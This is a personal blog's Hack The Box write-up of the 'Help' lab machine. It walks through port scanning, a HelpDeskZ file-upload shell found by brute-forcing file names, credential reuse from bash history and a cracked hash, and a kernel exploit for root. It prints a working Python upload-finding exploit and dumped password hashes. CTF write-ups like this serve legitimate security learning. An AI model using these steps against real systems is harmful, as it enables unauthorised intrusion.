<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>Hack The Box: Help write-up | GoDiego</title><meta name="generator" content="Jekyll v4.0.1" /><meta property="og:title" content="Hack The Box: Help write-up" /><meta name="author" content="Diego Bernal Adelantado" /><meta property="og:locale" content="en_US" /><meta name="description" content="File upload that leads to user and then kernel exploit. Too easy right?" /><meta property="og:description" content="File upload that leads to user and then kernel exploit. Too easy right?" /><link rel="canonical" href="https://diego95root.github.io/posts/Help/" /><meta property="og:url" content="https://diego95root.github.io/posts/Help/" /><meta property="og:site_name" content="GoDiego" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2019-02-07T00:00:00+01:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Hack The Box: Help write-up" /><meta name="twitter:site" content="@secfaults" /><meta name="twitter:creator" content="@Diego Bernal Adelantado" /> <script type="application/ld+json"> {"@type":"BlogPosting","headline":"Hack The Box: Help write-up","dateModified":"2019-02-07T00:00:00+01:00","datePublished":"2019-02-07T00:00:00+01:00","url":"https://diego95root.github.io/posts/Help/","mainEntityOfPage":{"@type":"WebPage","@id":"https://diego95root.github.io/posts/Help/"},"author":{"@type":"Person","name":"Diego Bernal Adelantado"},"description":"File upload that leads to user and then kernel exploit. Too easy right?","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><meta name="twitter:image" content="/assets/img/favicons/favicon.ico" /><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><meta name="google-site-verification" content="H84_zouPIHmurw2-AF7oHrWvvqJ1HhxxPpp1B6Vjpx4" /><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/combine/npm/jquery@3.4.1,npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/combine/npm/jquery@3.4.1,npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" crossorigin="anonymous"></script> <script src="https://polyfill.io/v3/polyfill.min.js?features=es6" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js" async crossorigin="anonymous"></script> <script src="/assets/js/dist/commons.js" async></script> <script src="/assets/js/dist/timeago.min.js" async></script><link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js"> <script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script> <script src="/assets/js/dist/toc.min.js" async></script> <script src="/assets/js/dist/tooltip-loader.min.js" async></script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/favicons/logo.png" alt="avatar"> </a></div><div class="profile-text mt-3"><div id="site-title"> <a href="/">GoDiego</a></div><div id="site-subtitle" class="font-italic">Student, Bug Hunter, Security Enthusiast</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-3 mr-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-3 mr-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/timeline/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i> <span>TIMELINE</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i> <span>ABOUT ME</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/diego95root" target="_blank"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/secfaults" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="https://www.linkedin.com/in/diego-bernal-adelantado" target="_blank"> <i class="fab fa-linkedin"></i> </a> <a href="https://www.hackthebox.eu/home/users/profile/31531" target="_blank"> <i class="fas fa-cube"></i> </a> <a href=" javascript:window.open('mailto:' + ['diegobernal0905','gmail.com'].join('@'))" > <i class="fas fa-envelope"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Hack The Box: Help write-up</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hack The Box: Help write-up</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago" data-toggle="tooltip" data-placement="bottom" title="Thu, Feb 7, 2019, 12:00 AM +0100"> Feb 7, 2019 <i class="unloaded">2019-02-07T00:00:00+01:00</i> </span> by <span class="author"> Diego Bernal Adelantado </span></div></div><div class="post-content"> <img src="/assets/posts_details/Help/images/header.png"><h1 id="hack-the-box-help-machine-write-up">Hack The Box: Help machine write-up</h1><p>This is a cool machine based on a file upload which leads to user followed by a kernel exploit that grants us root. Not quite complicated right? The machine is running on port 10.10.10.121.</p><h3 id="enumeration">Enumeration</h3><p>First, I enumerate open ports to discover the services running in the machine:</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nmap <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-oA</span> nmap/initial 10.10.10.121
</pre></table></code></div></div><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre><span class="gp">#</span><span class="w"> </span>Nmap 7.70 scan initiated Wed Feb  6 19:50:38 2019 as: nmap <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-oA</span> nmap/initial 10.10.10.121
<span class="go">Nmap scan report for 10.10.10.121
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
</span><span class="gp">22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
</span><span class="gp">|_http-title: Site doesn't have a title (application/json;</span><span class="w"> </span><span class="nv">charset</span><span class="o">=</span>utf-8<span class="o">)</span><span class="nb">.</span>
<span class="gp">Service Info: OS: Linux;</span><span class="w"> </span>CPE: cpe:/o:linux:linux_kernel
<span class="go">
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span><span class="gp">#</span><span class="w"> </span>Nmap <span class="k">done </span>at Wed Feb  6 19:50:53 2019 <span class="nt">--</span> 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>15.03 seconds
</pre></table></code></div></div><p>As we can see, there is SSH enabled, a node.js instance on port 3000 and a web server on port 80. I didn’t even use the node service, so I think this attack vector was a bit unintended. It’s the only one that I found, though.</p><p><em>Accessing web server on port 80</em></p><p><img src="/assets/posts_details/Help/images/apache.png" alt="Img" title="Img" /></p><p>Upon finding the Apache2 default page I decided to use DirBuster to try to find juicy things. The most interesting things found were these two directories:</p><ul><li><code class="highlighter-rouge">/support/</code></li><li><code class="highlighter-rouge">/support/uploads/tickets/</code> (this second one will be used later)</li></ul><p><em>HelpDeskZ running on <code class="highlighter-rouge">/support</code></em></p><p><img src="/assets/posts_details/Help/images/hd1.png" alt="Img" title="Img" /></p><p>We see that apart from logging in there is as well the possibility of uploading a ticket.</p><p><em>Ticket submission page</em></p><p><img src="/assets/posts_details/Help/images/hd2.png" alt="Img" title="Img" /></p><p>And guess what, it can include a file! Looks like we may have found something exploitable.</p><p><em>Possibility to upload a file</em></p><p><img src="/assets/posts_details/Help/images/hd3.png" alt="Img" title="Img" /></p><h3 id="exploit">Exploit</h3><p>First of all, I tried to upload a PHP file, but got this error.</p><p><em>Error upon uploading a PHP file</em></p><p><img src="/assets/posts_details/Help/images/file_blocked.png" alt="Img" title="Img" /></p><p>So then I searched on the internet and came across a python code that was supposedly exploiting this file upload feature:</p><div class="language-py highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">requests</span>

<span class="k">print</span> <span class="s">'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'</span>

<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">:</span>
    <span class="k">print</span> <span class="s">"Usage: {} [baseUrl] [nameOfUploadedFile]"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

<span class="n">helpdeskzBaseUrl</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">fileName</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>

<span class="n">currentTime</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">time</span><span class="p">.</span><span class="n">time</span><span class="p">())</span>

<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">300</span><span class="p">):</span>
    <span class="n">plaintext</span> <span class="o">=</span> <span class="n">fileName</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">currentTime</span> <span class="o">-</span> <span class="n">x</span><span class="p">)</span>
    <span class="n">md5hash</span> <span class="o">=</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">md5</span><span class="p">(</span><span class="n">plaintext</span><span class="p">).</span><span class="n">hexdigest</span><span class="p">()</span>

    <span class="n">url</span> <span class="o">=</span> <span class="n">helpdeskzBaseUrl</span><span class="o">+</span><span class="n">md5hash</span><span class="o">+</span><span class="s">'.php'</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">head</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">response</span><span class="p">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"found!"</span>
        <span class="k">print</span> <span class="n">url</span>
        <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>

<span class="k">print</span> <span class="s">"Sorry, I did not find anything"</span>
</pre></table></code></div></div><p>Apparently, it tries to brute-force the name of a file, which is an md5 hash of the file + the time at which it was created. Weird… Then, I found out the code was in GitHub! You can find it <a href="https://github.com/evolutionscript/HelpDeskZ-1.0">here</a>. So I started going through it and found out a really interesting thing on this piece of code:</p><p><em>Vulnerable piece of code</em></p><p><img src="/assets/posts_details/Help/images/github1.png" alt="Img" title="Img" /></p><p><img src="/assets/posts_details/Help/images/github2.png" alt="Img" title="Img" /></p><p>Unbelievable! They are storing the file and afterwards doing the security check! The developers must have thought that security would be kept by just hashing the name of the file with the upload time.</p><p>It took me some time to realise why the script wasn’t working, but I finally realised that it was because the path wasn’t right, all files were being uploaded to <code class="highlighter-rouge">/support/uploads/tickets/</code>. I tried uploading an image to check this and it worked!</p><p><em>Image uploaded path</em></p><p><img src="/assets/posts_details/Help/images/image_upload.png" alt="Img" title="Img" /></p><p>Now I just needed to upload a shell and launch the script! Surprisingly, we’re already user <code class="highlighter-rouge">help</code>!. So I tried reading the <code class="highlighter-rouge">user.txt</code> hash and got it without problem:</p><p><em>Getting a reverse shell</em></p><p><img src="/assets/posts_details/Help/images/shell.png" alt="Img" title="Img" /></p><h3 id="privilege-escalation">Privilege escalation</h3><p>I inspected the system and found inside the <code class="highlighter-rouge">.bash_history</code> file this entry:</p><p><code class="highlighter-rouge">mysql -uroot -phelpme support</code></p><p>So I ran it and got different tables, from which <code class="highlighter-rouge">users</code> was definitely the most interesting one:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
</pre><td class="rouge-code"><pre><span class="gp">mysql&gt;</span><span class="w"> </span>show tables<span class="p">;</span>
<span class="go">+------------------------+
| Tables_in_support      |
+------------------------+
| articles               |
| attachments            |
| canned_response        |
| custom_fields          |
| departments            |
| emails                 |
| error_log              |
| file_types             |
| knowledgebase_category |
| login_attempt          |
| login_log              |
| news                   |
| pages                  |
| priority               |
| settings               |
| staff                  |
| tickets                |
| tickets_messages       |
| users                  |
+------------------------+
19 rows in set (0.00 sec)

</span><span class="gp">mysql&gt;</span><span class="w"> </span><span class="k">select</span> <span class="k">*</span> from <span class="nb">users</span><span class="p">;</span>
<span class="go">+----+------------+----------+-----------------------+------------------------------------------+-----------------+--------+
| id | salutation | fullname | email                 | password                                 | timezone        | status |
+----+------------+----------+-----------------------+------------------------------------------+-----------------+--------+
|  1 |          0 | helpme   | helpme@helpme.com     | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Europe/Brussels |      1 |
|  2 |          0 | xcvxv    | lolololol@yopmail.com | ec09fa0d0ba74336ea7fe392869adb198242f15a | NULL            |      1 |
+----+------------+----------+-----------------------+------------------------------------------+-----------------+--------+
9 rows in set (0.00 sec)
</span></pre></table></code></div></div><p>I cracked helpme’s hash <code class="highlighter-rouge">c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca</code> and got <code class="highlighter-rouge">Welcome1</code>. Then, I tried loggin in as <code class="highlighter-rouge">help</code> through SSH with that password and success! That made things so much easier.</p><p>Getting back to the privesc part, I ran <code class="highlighter-rouge">uname -a</code> to find the kernel’s version to get the following:</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>help@help:~$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
</pre></table></code></div></div><p>It was obviously Linux Kernel 4.4 so I used <code class="highlighter-rouge">searchsploit</code> to try to find some useful exploit. And indeed there was a local privilege escalation, which I finally used.</p><p><em>Finding the right exploit with searchsploit</em></p><p><img src="/assets/posts_details/Help/images/searchsploit.png" alt="Img" title="Img" /></p><p>I copied the C code to the machine serving it with python SimpleHTTPServer and then using wget. Once there, I just needed to compile and run it!</p><p><em>Getting root</em></p><p><img src="/assets/posts_details/Help/images/root.png" alt="Img" title="Img" /></p><p>Note: I’ll keep the hash here in case it is needed to read write-ups (b7fe6082dcdf0c1b1e02ab0d9daddb98).</p><p>Really nice machine! Kudos to the creator! I hope you enjoyed reading.</p><hr /> <center><i>Diego Bernal Adelantado</i></center></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hack-the-box/'>Hack The Box</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/hack-the-box/" class="post-tag no-text-decoration" >Hack The Box</a> <a href="/tags/pentesting/" class="post-tag no-text-decoration" >Pentesting</a> <a href="/tags/file-upload/" class="post-tag no-text-decoration" >File Upload</a> <a href="/tags/kernel-exploit/" class="post-tag no-text-decoration" >Kernel exploit</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hack The Box: Help write-up - GoDiego&url=https://diego95root.github.io/posts/Help/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hack The Box: Help write-up - GoDiego&u=https://diego95root.github.io/posts/Help/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Hack The Box: Help write-up - GoDiego&url=https://diego95root.github.io/posts/Help/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://diego95root.github.io/posts/Help/" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank"> <i class="fa-fw fab fa-linkedin"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/Fuse/">HackTheBox: Fuse write-up</a></li><li><a href="/posts/Magic/">Hack The Box: Magic write-up</a></li><li><a href="/posts/Cache/">HackTheBox: Cache write-up</a></li><li><a href="/posts/Blunder/">HackTheBox: Blunder write-up</a></li><li><a href="/posts/Admirer/">HackTheBox: Admirer write-up</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/sql/">SQL</a> <a class="post-tag" href="/tags/ctf/">CTF</a> <a class="post-tag" href="/tags/permissions/">Permissions</a> <a class="post-tag" href="/tags/ssh/">SSH</a> <a class="post-tag" href="/tags/php/">PHP</a> <a class="post-tag" href="/tags/enumeration/">Enumeration</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/smb/">SMB</a> <a class="post-tag" href="/tags/john/">John</a> <a class="post-tag" href="/tags/file-upload/">File Upload</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-3">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Chaos/" class="btn btn-outline-primary"><p>Hack The Box: Chaos write-up</p></a> <a href="/posts/FriendZone/" class="btn btn-outline-primary"><p>Hack The Box: FriendZone write-up</p></a></div><!-- The related posts of current post. Placed in the bottom of every single post. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-4 mb-2 mb-sm-4 pb-2"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Networked/"><div class="card-body"> <span class="timeago small"> Sep 4, 2019 <i class="unloaded">2019-09-04T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box: Networked write-up</h3><div class="text-muted small"><p>Hack The Box: Networked machine write-up This was an easy machine which focuses on a simple thing: performing good checks when writing code. It starts by exploiting a file upload and then the esca...</p></div></div></a></div><div class="card"> <a href="/posts/Magic/"><div class="card-body"> <span class="timeago small"> May 18, 2020 <i class="unloaded">2020-05-18T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box: Magic write-up</h3><div class="text-muted small"><p>Hack The Box: Magic machine write-up This was an easy machine if you were a bit experienced in web application bugs, as the main vulnerability was a file upload that was used to get a reverse shel...</p></div></div></a></div><div class="card"> <a href="/posts/Admirer/"><div class="card-body"> <span class="timeago small"> Jun 3, 2020 <i class="unloaded">2020-06-03T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox: Admirer write-up</h3><div class="text-muted small"><p>Hack The Box: Magic machine write-up This was one of the most interesting machines I’ve solved in Hack The Box, learned some cool techniques. It taught me how recon never ends, despite having foun...</p></div></div></a></div></div></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js" crossorigin="anonymous"></script> <script type="text/javascript"> const el = document.querySelectorAll('#post-wrapper img'); const observer = lozad(el); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2020 <a href="https://twitter.com/secfaults">Diego Bernal Adelantado</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the 